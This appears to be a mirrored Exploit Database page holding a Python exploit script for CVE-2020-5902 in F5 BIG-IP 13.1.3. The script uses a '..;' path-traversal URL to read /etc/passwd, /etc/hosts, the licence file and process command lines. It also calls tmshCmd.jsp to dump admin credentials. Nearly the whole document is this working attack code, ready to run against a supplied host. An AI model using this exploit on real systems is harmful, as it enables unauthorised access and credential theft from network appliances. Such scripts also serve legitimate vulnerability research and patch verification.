F5 Big-IP 13.1.3 Build 0.0.6 – Local File Inclusion

• Exploit Database
• 117 阅读

• 作者： Carlos E. Vieira
  日期： 2020-07-26
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/48711/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129

  # Exploit Title: F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion # Date: 2019-08-17 # Exploit Author: Carlos E. Vieira # Vendor Homepage: https://www.f5.com/products/big-ip-services # Version: <= 13.1.3 # Tested on: BIG-IP 13.1.3 Build 0.0.6 # CVE : CVE-2020-5902   #!/usr/bin/env python   import requests import sys import time import urllib3 import json urllib3.disable_warnings()   global target   def checkTarget():   r = requests.head(target + "/tmui/login.jsp", verify=False) if(r.status_code == 200): return True else: return False   def checkVuln():   r = requests.get(target + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd", verify=False) if(r.status_code == 200):   data = json.loads(r.text) if(len(data[&apos;output&apos;]) > 0): return True else: return False   else: return False   def leakPasswd(): print("[+] Leaking /etc/passwd from server") time.sleep(2) exploit(&apos;/etc/passwd&apos;)     def leakHosts(): print("[+] Leaking /etc/hosts from server") time.sleep(2) exploit(&apos;/etc/hosts&apos;)   def leakLicence():   print("[+] Leaking /config/bigip.license from server") time.sleep(2) exploit(&apos;/config/bigip.license&apos;)   def leakAdmin():   print("[+] Leaking admin credentials from server") time.sleep(2) r = requests.get(target + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin", verify=False) if(r.status_code == 200):   data = json.loads(r.text) if(len(data[&apos;output&apos;]) > 0 ): print(data[&apos;output&apos;]) else: print("[X] Admin credentials not found") else: print("[X] Fail to read file")     def exploit(file):   r = requests.get(target + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=" + file, verify=False) if(r.status_code == 200): data = json.loads(r.text) print(data[&apos;output&apos;]) else: print("[X] Fail to read file")   def memoryLeak(): print("[!] Leaking tomcat process from server") time.sleep(2) r = requests.get(target + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/self/cmdline", verify=False) if(r.status_code == 200): data = json.loads(r.text) if(len(data[&apos;output&apos;])>0): print("Command: " + data[&apos;output&apos;])   def main(host):   print("[+] Check target...") global target target = "https://" + host   check = checkTarget() if(check): print("[~] Target is available")   vuln = checkVuln() if(vuln): print("[+] Target is vulnerable!")   time.sleep(1) print("[~] Leak information from target!") time.sleep(1) leakPasswd() leakHosts() leakLicence() leakAdmin() memoryLeak() else: print("[X] Target is&apos;t vulnerable")   else: print("[x] Target is unavailable")     if __name__ == "__main__":   if(len(sys.argv) < 2): print("Use: python {} ip/dns".format(sys.argv[0])) else: host = sys.argv[1] main(host)